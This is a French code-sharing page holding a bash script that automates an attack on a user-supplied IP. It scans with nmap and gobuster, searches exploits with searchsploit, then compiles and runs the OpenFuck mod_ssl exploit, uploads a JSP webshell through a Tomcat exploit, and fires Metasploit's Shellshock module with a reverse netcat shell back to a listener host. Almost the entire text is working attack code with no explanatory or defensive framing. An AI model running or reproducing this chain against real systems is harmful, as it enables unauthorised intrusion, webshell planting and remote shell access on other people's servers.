Voici votre URL de partage https://sharemycode.io/c/2033991 (Cliquer pour copier) (Copié)
#!/bin/bash
# Couleurs pour un affichage clair
GREEN='\033[0;32m'
RED='\033[0;31m'
NC='\033[0m' # Pas de couleur
# Demander l'IP cible
read -p "Entrez l'adresse IP de la cible (ex: 192.168.210.4) : " TARGET
echo -e "${GREEN}--- Début de l'analyse de la cible : $TARGET ---${NC}"
# 1️⃣ Scanner les ports et services actifs
echo -e "${GREEN}[1/6] Scan des ports ouverts et des vulnérabilités Apache...${NC}"
nmap -p 80 --script http-server-header,http-vuln* $TARGET -oN nmap_report.txt
echo -e "${GREEN}Résultats sauvegardés dans nmap_report.txt${NC}"
# 2️⃣ Trouver des fichiers et répertoires cachés
echo -e "${GREEN}[2/6] Scan des répertoires cachés avec Gobuster...${NC}"
gobuster dir -u http://$TARGET -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt,log,sql -o gobuster_report.txt
echo -e "${GREEN}Résultats sauvegardés dans gobuster_report.txt${NC}"
# 3️⃣ Vérifier les exploits disponibles
echo -e "${GREEN}[3/6] Recherche d'exploits pour Apache sur la cible...${NC}"
searchsploit apache 2.4.58 > exploits_apache.txt
echo -e "${GREEN}Résultats sauvegardés dans exploits_apache.txt${NC}"
# 4️⃣ Tester l'exploit OpenFuck si mod_ssl est vulnérable
if grep -q "mod_ssl" exploits_apache.txt; then
echo -e "${RED}Vulnérabilité détectée dans mod_ssl!${NC}"
searchsploit -m unix/remote/764.c
gcc 764.c -o openfuck -lssl -lcrypto
./openfuck 0x6b http://$TARGET
fi
# 5️⃣ Tester l'exploit Tomcat JSP Upload si Apache Tomcat est détecté
if grep -q "Tomcat" exploits_apache.txt; then
echo -e "${RED}Tomcat détecté ! Tentative d'upload d'un webshell...${NC}"
searchsploit -m jsp/webapps/42966.py
python3 42966.py -u http://$TARGET --upload shell.jsp
echo -e "${GREEN}Webshell uploadé, accès ici : http://$TARGET/shell.jsp${NC}"
fi
# 6️⃣ Exploiter Apache avec Metasploit si vulnérable
if grep -q "mod_cgi" exploits_apache.txt; then
echo -e "${RED}Tentative d'exécution de code avec Metasploit...${NC}"
msfconsole -q -x "
use exploit/unix/http/apache_mod_cgi_bash_env_exec;
set RHOSTS $TARGET;
set TARGETURI /;
set PAYLOAD cmd/unix/reverse_netcat;
set LHOST 192.168.210.5;
set LPORT 4444;
exploit"
fi
echo -e "${GREEN}--- SCAN ET TESTS TERMINÉS ---${NC}"
echo -e "📂 Résultats enregistrés dans :"
echo -e " - nmap_report.txt"
echo -e " - gobuster_report.txt"
echo -e " - exploits_apache.txt"
Informations
Cet extrait a été créé le 22 janv. 2025 à 02:29:31
Cet extrait expire le 21 févr. 2025 à 02:29:31
Langage : bash
Link
Voici votre URL de partage : https://sharemycode.io/c/2033991 Copié